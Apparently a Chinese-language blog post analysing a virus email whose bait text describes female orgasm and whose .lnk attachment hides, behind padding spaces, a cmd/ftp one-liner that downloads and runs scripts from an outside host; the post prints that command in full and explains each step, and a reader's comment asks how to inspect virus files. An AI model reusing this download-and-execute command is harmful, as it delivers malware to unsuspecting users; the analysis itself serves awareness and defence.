病毒的花招 捷徑檔

前些天收到這封信

女性也射精的最新研究

女性在達到性高潮的一剎那,即陰道充血、膨脹到後期,
陰道平滑肌發生三至六次節律性收縮,會陰及全身的許
多肌群亦同時出現數次控制不住的痙攣性收縮,陰部的
脹滿感瞬間向全身放射,隨著高度的性快感,意識變得
模糊起來,部分女性可發出柔聲輕喚,而極個別女性可
伴有“射精”現象

然後附加了一個檔案

女性也射精的最新研究.lnk

一附就是我是病毒的樣子,看來是某個有我信箱的人中毒自動寄過來的病毒信,有趣的是,看到.lnk我直覺地想應該會開啟某個惡意網站,但是我另存來看看,發現我錯了

他捷徑的目標是這樣

“%windir%system32cmd.exe /c echo open tloaindm5.2288.org>>t.t&echo 123>>t.t&echo 123>>t.t&echo get down2.bat c:down2.bat>>t.t&echo get vnet2.vbs %windir%vnet2.vbs>>t.t&echo bye>>t.t&ftp -s:t.t&del t.t&start %windir%vnet2.vbs&                     ”

後面接了一大串的空白,沒仔細看還以為是空白,原來字都在前面,這病毒還真是奸巧

他的目標執行的東西是這樣

echo open tloaindm5.2288.org >> t.t
echo 123>>t.t
echo 123>>t.t
echo get down2.bat c:down2.bat>>t.t
echo get vnet2.vbs %windir%vnet2.vbs>>t.t
echo bye>>t.t
ftp -s:t.t
del t.t
start %windir%vnet2.vbs

所以他會建立一個t.t的檔案,然後用ftp指令執行,連到tloaindm5.2288.org接著下載down2.bat,然後是vnet2.vbs,我上去那個被開ftp都不知道的倒霉鬼的ftp站台參觀了一下,它的檔案有這些

病毒FTP的檔案內容

病毒FTP的檔案內容

看到lineage.exe,一附就是衝著線上遊戲天堂來的,我猜他可能會把天堂的執行檔給替換掉之類的

沒有仔細繼續研究裡面的東西,有興趣的人自己繼續研究裡面的東西吧,lnk捷徑檔執行病毒的確是蠻有創意的,這年頭什麼檔案看來都不應該相信

This entry was posted in 中文文章, 病毒 and tagged . Bookmark the permalink.

One Response to 病毒的花招 捷徑檔

  1. Alex says:

    你好!!
    我想請問一下

    我想要像你一樣看那個病毒的原始檔..
    我是不是只要用另存到電腦然後用沙盤去編輯檔案呢?

    但是假如有些檔案是.exe的
    你要怎樣看他的原始碼呢?

    因為我有興趣!!